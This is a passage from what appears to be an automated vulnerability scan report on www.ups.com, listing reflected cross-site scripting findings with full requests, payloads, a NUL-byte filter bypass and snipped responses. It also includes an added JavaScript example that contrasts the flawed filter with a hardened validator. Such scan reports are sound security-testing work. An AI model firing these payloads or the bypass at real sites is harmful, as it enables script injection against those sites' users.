The value of the loc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %00d4c38'-alert(1)-'57345105a30 was submitted in the loc parameter. This input was echoed as d4c38'-alert(1)-'57345105a30 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /myups/addresses?loc=en_US%00d4c38'-alert(1)-'57345105a30&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:12 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 14513


<!-- SearchBodyStart -->


<!--
Content Name: LoginCustomForSSO.jsp
-->

<!-- Begin include -->


<body onload="document.LoginPage.elements['bean.uid'].focus()"/>


<S
...[SNIP]...
05a30&appid=IMS';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + '/myups/info/home?loc=en_US_d4c38'-alert(1)-'57345105a30&appid=IMS';
}
else
{

//actionUrl = ssoLoginUrl + "0" + "&returnto=" + '/myups/info/home?loc=en_US_d4c38'-alert(1)-'57345105a30&appid=IMS';
actionUrl = "/one-to-on
...[SNIP]...

1.438. https://www.ups.com/myups/addresses [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.ups.com
Path:   /myups/addresses

Issue detail

The value of the loc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00f1aca"><script>alert(1)</script>b1110c7fd4f was submitted in the loc parameter. This input was echoed as f1aca"><script>alert(1)</script>b1110c7fd4f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /myups/addresses?loc=en_US%00f1aca"><script>alert(1)</script>b1110c7fd4f&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:09 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15218


<!-- SearchBodyStart -->


<!--
Content Name: LoginCustomForSSO.jsp
-->

<!-- Begin include -->


<body onload="document.LoginPage.elements['bean.uid'].focus()"/>


<S
...[SNIP]...
<a href="/myups/forgotpassword?loc=en_US_f1aca"><script>alert(1)</script>b1110c7fd4f&returnto=%2Fmyups%2Ffinishlogin%3Floc%3Den_US_f1aca%26quot%3B%26gt%3B%26lt%3Bscript%26gt%3Balert%281%29%26lt%3B%2Fscript%26gt%3Bb1110c7fd4f%26amp%3Bauto%3D0%26amp%3Breturnto%3D%2Fmyups%2Finfo%2Fhome%3
...[SNIP]...

1.439. https://www.ups.com/myups/forgotpassword [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.ups.com
Path:   /myups/forgotpassword

Issue detail

The value of the loc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00c39c0"><script>alert(1)</script>9c8c2a16b70 was submitted in the loc parameter. This input was echoed as c39c0"><script>alert(1)</script>9c8c2a16b70 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Request

GET /myups/forgotpassword?loc=en_US%00c39c0"><script>alert(1)</script>9c8c2a16b70 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:03 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 30759


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<script src="/assets/calendar/201001_02_00/calendar_201001_02_00_en_US_c39c0"><script>alert(1)</script>9c8c2a16b70.obf.cache.js" type="text/javascript" charset="utf-8">
...[SNIP]...

1.440. https://www.ups.com/one-to-one/forgot [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.ups.com
Path:   /one-to-one/forgot

Issue detail

The value of the loc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %002da2b"><script>alert(1)</script>1d4bc2b1a72 was submitted in the loc parameter. This input was echoed as 2da2b"><script>alert(1)</script>1d4bc2b1a72 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Request

GET /one-to-one/forgot?loc=en_US%002da2b"><script>alert(1)</script>1d4bc2b1a72&WT.svl=SubNav HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:10 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 30759


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<script src="/assets/calendar/201001_02_00/calendar_201001_02_00_en_US_2da2b"><script>alert(1)</script>1d4bc2b1a72.obf.cache.js" type="text/javascript" charset="utf-8">
...[SNIP]...

1.441. https://www.ups.com/one-to-one/register [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.ups.com
Path:   /one-to-one/register

Issue detail

The value of the loc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0062e6e"><script>alert(1)</script>1d53815f05 was submitted in the loc parameter. This input was echoed as 62e6e"><script>alert(1)</script>1d53815f05 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Request

GET /one-to-one/register?sysid=myups&lang=en&langc=US&loc=en_US%0062e6e"><script>alert(1)</script>1d53815f05 HTTP/1.1
Host: www.ups.com
Connection: keep-alive
Referer: http://www.ups.com/?Site=Corporate&cookie=us_en_home&inputImgTag=&setCookie=yes
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:17:18 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Keep-Alive: timeout=65
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 32223


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<script src="/assets/calendar/201001_02_00/calendar_201001_02_00_en_US_62e6e"><script>alert(1)</script>1d53815f05.obf.cache.js" type="text/javascript" charset="utf-8">
...[SNIP]...
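The null-byte bypass in findings 1.436 to 1.441 (and again in 1.448), as an added example that is not code from ups.com, the scanner or this report. It models an assumed blacklist filter that inspects only the bytes before the first NUL, shows the report's own payload from finding 1.439 passing that filter and landing in the calendar script tag, and contrasts it with a filter that percent-decodes first, rejects NUL and malformed encodings, allow-lists the locale and still encodes on output. The function names, the blacklist, the locale format and the fallback value are assumptions; the sink template is copied from the report's responses.

```javascript
// Added example for findings 1.436-1.441 and 1.448: not code from ups.com or
// the scanner. Models a blacklist filter that, like a C-string routine, stops
// reading at the first NUL byte, next to a decode-then-allow-list validator.

const BLOCKED_CHARS = ['<', '>', '"', "'"]; // assumed blacklist

// Assumed vulnerable check: only the bytes before the first NUL are inspected.
function nulTerminatedFilterAllows(rawParam) {
  const decoded = decodeURIComponent(rawParam);
  const inspected = decoded.split('\u0000')[0];
  return !BLOCKED_CHARS.some((c) => inspected.includes(c));
}

// Assumed vulnerable sink: the whole decoded value is echoed, unencoded, into a
// double-quoted attribute (the report's responses show the NUL position as '_').
function renderCalendarScriptTagVulnerable(rawParam) {
  const loc = decodeURIComponent(rawParam).replace(/\u0000/g, '_');
  return `<script src="/assets/calendar/201001_02_00/calendar_201001_02_00_${loc}.obf.cache.js" type="text/javascript" charset="utf-8"></script>`;
}

// Hardened validation: decode once, refuse NUL and malformed percent-encoding,
// then allow-list the value instead of blacklisting characters. null = reject.
function validateLoc(rawParam) {
  let decoded;
  try {
    decoded = decodeURIComponent(rawParam);
  } catch (e) {
    return null; // URIError: malformed percent-encoding
  }
  if (decoded.includes('\u0000')) return null;
  return /^[a-z]{2}_[A-Z]{2}$/.test(decoded) ? decoded : null; // assumed locale format
}

// Output encoding for a double-quoted HTML attribute, applied even to values
// that passed the allow-list (defence in depth).
function htmlAttrEncode(s) {
  return s.replace(/[&<>"']/g, (ch) => `&#x${ch.charCodeAt(0).toString(16)};`);
}

function renderCalendarScriptTagHardened(rawParam, fallbackLoc = 'en_US') {
  const loc = validateLoc(rawParam) || fallbackLoc;
  return `<script src="/assets/calendar/201001_02_00/calendar_201001_02_00_${htmlAttrEncode(loc)}.obf.cache.js" type="text/javascript" charset="utf-8"></script>`;
}

// Constructed inputs: the report's payload from finding 1.439, with and without %00.
const PAYLOAD_WITH_NUL = 'en_US%00c39c0"><script>alert(1)</script>9c8c2a16b70';
const PAYLOAD_WITHOUT_NUL = 'en_USc39c0"><script>alert(1)</script>9c8c2a16b70';

function demo() {
  return {
    filterAllowsWithNul: nulTerminatedFilterAllows(PAYLOAD_WITH_NUL),       // true: bypassed
    filterAllowsWithoutNul: nulTerminatedFilterAllows(PAYLOAD_WITHOUT_NUL), // false: caught
    vulnerableHtml: renderCalendarScriptTagVulnerable(PAYLOAD_WITH_NUL),     // carries the injected <script>
    hardenedHtml: renderCalendarScriptTagHardened(PAYLOAD_WITH_NUL),         // falls back to en_US
  };
}

console.log(demo());
```

The point of the allow-list is that the NUL trick only works against a check that reasons about the "visible" prefix of the value; once the validator operates on the fully decoded string and refuses anything that is not a well-formed locale, there is no character to smuggle past it, and the attribute encoding covers the case where a future code path relaxes the allow-list.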

1.442. https://www.ups.com/osa/orderSupplies [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /osa/orderSupplies

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f1c2b'%3b9f6735610f2 was submitted in the REST URL parameter 1. This input was echoed as f1c2b';9f6735610f2 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /osaf1c2b'%3b9f6735610f2/orderSupplies HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:31 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40992


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
Supplies?appid=WBSO';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + 'https://www.ups.com/osaf1c2b';9f6735610f2/orderSupplies?appid=WBSO';
}
else
{

//actionUrl = ssoLoginUrl + "0" + "&returnto=" + 'https://www.ups.com/osaf1c2b';9f6735610f2/orderSupplies?appid=WBSO';
actionU
...[SNIP]...

1.443. https://www.ups.com/osa/orderSupplies [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /osa/orderSupplies

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93460"%20a%3db%2031fb5663470 was submitted in the REST URL parameter 1. This input was echoed as 93460" a=b 31fb5663470 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. Note that the affected element is a hidden input (type="Hidden"), which is neither rendered nor focusable, so injected event-handler attributes have no ordinary trigger; a working attack would need to close the tag. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /osa93460"%20a%3db%2031fb5663470/orderSupplies HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:28 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 41087


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="https://www.ups.com/osa93460" a=b 31fb5663470/orderSupplies?appid=WBSO">
...[SNIP]...

1.444. https://www.ups.com/osa/orderSupplies [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /osa/orderSupplies

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript rest-of-line comment. The payload ba640%0a7ba9ebff89 was submitted in the REST URL parameter 1. This input was echoed as ba640, followed by a literal newline (the decoded %0a), followed by 7ba9ebff89 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript comment into which our data is being copied: a // comment ends at the line terminator, so everything after the injected newline is lexed as JavaScript code rather than as comment text. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /osaba640%0a7ba9ebff89/orderSupplies HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:33 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 41077


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
d = "";
theForm.elements['uid'].value=uidField;

if (theForm.elements['bean.autopop'].checked)
{

//actionUrl = ssoLoginUrl + "1" + "&returnto=" + 'https://www.ups.com/osaba640
7ba9ebff89
/orderSupplies?appid=WBSO';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + 'https://www.ups.c
...[SNIP]...

1.445. https://www.ups.com/osa/orderSupplies [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /osa/orderSupplies

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript rest-of-line comment. The payload 757e7%0a4c6ea7d00f3 was submitted in the REST URL parameter 2. This input was echoed as 757e7, followed by a literal newline (the decoded %0a), followed by 4c6ea7d00f3 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript comment into which our data is being copied: a // comment ends at the line terminator, so everything after the injected newline is lexed as JavaScript code rather than as comment text. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /osa/orderSupplies757e7%0a4c6ea7d00f3 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:47 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 41096


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
heForm.elements['uid'].value=uidField;

if (theForm.elements['bean.autopop'].checked)
{

//actionUrl = ssoLoginUrl + "1" + "&returnto=" + 'https://www.ups.com/osa/orderSupplies757e7
4c6ea7d00f3
?appid=WBSO';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + 'https://www.ups.com/osa/orderSu
...[SNIP]...

1.446. https://www.ups.com/osa/orderSupplies [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /osa/orderSupplies

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75362"%20a%3db%205c4e0ed9a9d was submitted in the REST URL parameter 2. This input was echoed as 75362" a=b 5c4e0ed9a9d in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. Note that the affected element is a hidden input (type="Hidden"), which is neither rendered nor focusable, so injected event-handler attributes have no ordinary trigger; a working attack would need to close the tag. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /osa/orderSupplies75362"%20a%3db%205c4e0ed9a9d HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:42 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 41085


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="https://www.ups.com/osa/orderSupplies75362" a=b 5c4e0ed9a9d?appid=WBSO">
...[SNIP]...

1.447. https://www.ups.com/osa/orderSupplies [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /osa/orderSupplies

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7b4d1'%3b2aeeb4d514c was submitted in the REST URL parameter 2. This input was echoed as 7b4d1';2aeeb4d514c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /osa/orderSupplies7b4d1'%3b2aeeb4d514c HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:46 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 41020


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
=WBSO';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + 'https://www.ups.com/osa/orderSupplies7b4d1';2aeeb4d514c?appid=WBSO';
}
else
{

//actionUrl = ssoLoginUrl + "0" + "&returnto=" + 'https://www.ups.com/osa/orderSupplies7b4d1';2aeeb4d514c?appid=WBSO';
actionUrl = "/one-to-
...[SNIP]...

1.448. https://www.ups.com/osa/orderSupplies [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.ups.com
Path:   /osa/orderSupplies

Issue detail

The value of the loc request parameter is copied into a JavaScript rest-of-line comment. The payload %001b456</script><script>alert(1)</script>dcaf37ce584 was submitted in the loc parameter. This input was echoed as 1b456</script><script>alert(1)</script>dcaf37ce584 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /osa/orderSupplies?loc=en_US%001b456</script><script>alert(1)</script>dcaf37ce584&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:20 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 9761


<!-- SearchBodyStart -->


<!--
Content Name: LoginCustomForSSO.jsp
-->

<!-- Begin include -->


<body onload="document.LoginPage.elements['bean.uid'].focus()"/>


<S
...[SNIP]...
"";
theForm.elements['uid'].value=uidField;

if (theForm.elements['bean.autopop'].checked)
{

//actionUrl = ssoLoginUrl + "1" + "&returnto=" + '/myups/info/home?loc=en_US_1b456</script><script>alert(1)</script>dcaf37ce584&appid=WBSO';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + '/myups/info/home?loc=en_US_1b45
...[SNIP]...

1.449. https://www.ups.com/osa/orderSupplies [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.ups.com
Path:   /osa/orderSupplies

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %002cecd'-alert(1)-'557a7bd6f89 was submitted in the loc parameter. This input was echoed as 2cecd'-alert(1)-'557a7bd6f89 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /osa/orderSupplies?loc=en_US%002cecd'-alert(1)-'557a7bd6f89&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:14 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 9085


<!-- SearchBodyStart -->


<!--
Content Name: LoginCustomForSSO.jsp
-->

<!-- Begin include -->


<body onload="document.LoginPage.elements['bean.uid'].focus()"/>


<S
...[SNIP]...
6f89&appid=WBSO';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + '/myups/info/home?loc=en_US_2cecd'-alert(1)-'557a7bd6f89&appid=WBSO';
}
else
{

//actionUrl = ssoLoginUrl + "0" + "&returnto=" + '/myups/info/home?loc=en_US_2cecd'-alert(1)-'557a7bd6f89&appid=WBSO';
actionUrl = "/one-to-
...[SNIP]...

1.450. https://www.ups.com/osa/orderSupplies [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.ups.com
Path:   /osa/orderSupplies

Issue detail

The value of the loc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00ca0f2"><script>alert(1)</script>02364017778 was submitted in the loc parameter. This input was echoed as ca0f2"><script>alert(1)</script>02364017778 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

